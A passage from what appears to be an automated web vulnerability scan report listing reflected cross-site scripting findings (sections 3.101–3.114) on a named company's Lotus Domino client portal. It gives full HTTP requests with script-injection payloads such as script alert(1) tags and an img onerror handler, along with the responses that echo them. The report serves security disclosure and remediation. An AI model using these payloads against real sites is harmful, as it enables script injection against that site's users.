3.101. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [OpenForm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/ie

Issue detail

The value of the OpenForm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d6b9'-alert(1)-'068c4f3ccc4 was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/ie?OpenForm7d6b9'-alert(1)-'068c4f3ccc4 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.1.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:16 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19123
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
nt&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/ie?openform7d6b9'-alert(1)-'068c4f3ccc4'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.102. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [OpenForm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/ie

Issue detail

The value of the OpenForm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 947c9"><script>alert(1)</script>9e8695274cb was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/ie?OpenForm947c9"><script>alert(1)</script>9e8695274cb HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.1.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:12 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19183
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie?OpenForm947c9"><script>alert(1)</script>9e8695274cb" name="RedirectTo" />
...[SNIP]...

3.103. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/ie

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b400f'%3b53b1fc092ed was submitted in the REST URL parameter 2. This input was echoed as b400f';53b1fc092ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/ieb400f'%3b53b1fc092ed?OpenForm HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.1.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:37 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19110
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
h?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/ieb400f';53b1fc092ed?openform'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.104. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/ie

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dc14"><script>alert(1)</script>9cdacb9fa3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/ie1dc14"><script>alert(1)</script>9cdacb9fa3d?OpenForm HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.1.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:36 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19209
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie1dc14"><script>alert(1)</script>9cdacb9fa3d?OpenForm" name="RedirectTo" />
...[SNIP]...

3.105. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/ie

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ba6e'-alert(1)-'ee41175a30b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/ie?OpenForm&5ba6e'-alert(1)-'ee41175a30b=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.1.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:29 GMT
Last-Modified: Wed, 05 Oct 2011 19:46:27 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 23029
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>New User Registration</title>
   <base href="http://clientcentre.dstglobals
...[SNIP]...
rverNo + '~' + cServer
                       }
//                        alert(redir)
                       location = (redir)                
                   }
               }
           }

           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/ie?openform&5ba6e'-alert(1)-'ee41175a30b=1'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.106. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/ie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f957"><script>alert(1)</script>118bad92d24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/ie?OpenForm&1f957"><script>alert(1)</script>118bad92d24=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.1.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:25 GMT
Last-Modified: Wed, 05 Oct 2011 19:46:23 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 23118
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>New User Registration</title>
   <base href="http://clientcentre.dstglobals
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie?OpenForm&1f957"><script>alert(1)</script>118bad92d24=1" name="RedirectTo" />
...[SNIP]...

3.107. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [OpenIcon parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/$icon

Issue detail

The value of the OpenIcon request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3e8e"><script>alert(1)</script>5dc36f653b2 was submitted in the OpenIcon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/framework.nsf/$icon?OpenIconf3e8e"><script>alert(1)</script>5dc36f653b2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: clientcentre.dstglobalsolutions.com

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:33 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19152
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon?OpenIconf3e8e"><script>alert(1)</script>5dc36f653b2" name="RedirectTo" />
...[SNIP]...

3.108. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [OpenIcon parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/$icon

Issue detail

The value of the OpenIcon request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ef64'-alert(1)-'ec333ded5e5 was submitted in the OpenIcon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/framework.nsf/$icon?OpenIcon1ef64'-alert(1)-'ec333ded5e5 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: clientcentre.dstglobalsolutions.com

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:37 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19092
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
o=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/framework.nsf/$icon?openicon1ef64'-alert(1)-'ec333ded5e5'
           HTTP_Referer = ''
           RedirectTo = ''

   </script>
...[SNIP]...

3.109. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/$icon

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d6db"><script>alert(1)</script>9f5a6d4b7fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web5d6db"><script>alert(1)</script>9f5a6d4b7fa/framework.nsf/$icon?OpenIcon HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: clientcentre.dstglobalsolutions.com

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19174
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web5d6db"><script>alert(1)</script>9f5a6d4b7fa/framework.nsf/$icon?OpenIcon" name="RedirectTo" />
...[SNIP]...

3.110. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/$icon

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f27c'%3ba92bf23027c was submitted in the REST URL parameter 1. This input was echoed as 4f27c';a92bf23027c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web4f27c'%3ba92bf23027c/framework.nsf/$icon?OpenIcon HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: clientcentre.dstglobalsolutions.com

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19074
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
dbPath + '/switch?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web4f27c';a92bf23027c/framework.nsf/$icon?openicon'
           HTTP_Referer = ''
           RedirectTo = ''

   </script>
...[SNIP]...

3.111. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/$icon

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2852'%3b104f5b44c71 was submitted in the REST URL parameter 3. This input was echoed as d2852';104f5b44c71 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/framework.nsf/$icond2852'%3b104f5b44c71?OpenIcon HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: clientcentre.dstglobalsolutions.com

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:52 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19082
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
enagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/framework.nsf/$icond2852';104f5b44c71?openicon'
           HTTP_Referer = ''
           RedirectTo = ''

   </script>
...[SNIP]...

3.112. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/$icon

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a758"><img%20src%3da%20onerror%3dalert(1)>d2898fe56cb was submitted in the REST URL parameter 3. This input was echoed as 1a758"><img src=a onerror=alert(1)>d2898fe56cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /web/framework.nsf/$icon1a758"><img%20src%3da%20onerror%3dalert(1)>d2898fe56cb?OpenIcon HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: clientcentre.dstglobalsolutions.com

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:51 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19222
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon1a758"><img src=a onerror=alert(1)>d2898fe56cb?OpenIcon" name="RedirectTo" />
...[SNIP]...

3.113. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/_format/screen_05112010.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abdac'%3b7d4c96bb5a0 was submitted in the REST URL parameter 1. This input was echoed as abdac';7d4c96bb5a0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webabdac'%3b7d4c96bb5a0/framework.nsf/_format/screen_05112010.css?readform&ja= HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:15 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19225
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
dbPath + '/switch?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/webabdac';7d4c96bb5a0/framework.nsf/_format/screen_05112010.css?readform&ja='
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.114. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/_format/screen_05112010.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69cd6"><script>alert(1)</script>060324dbfe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web69cd6"><script>alert(1)</script>060324dbfe8/framework.nsf/_format/screen_05112010.css?readform&ja= HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
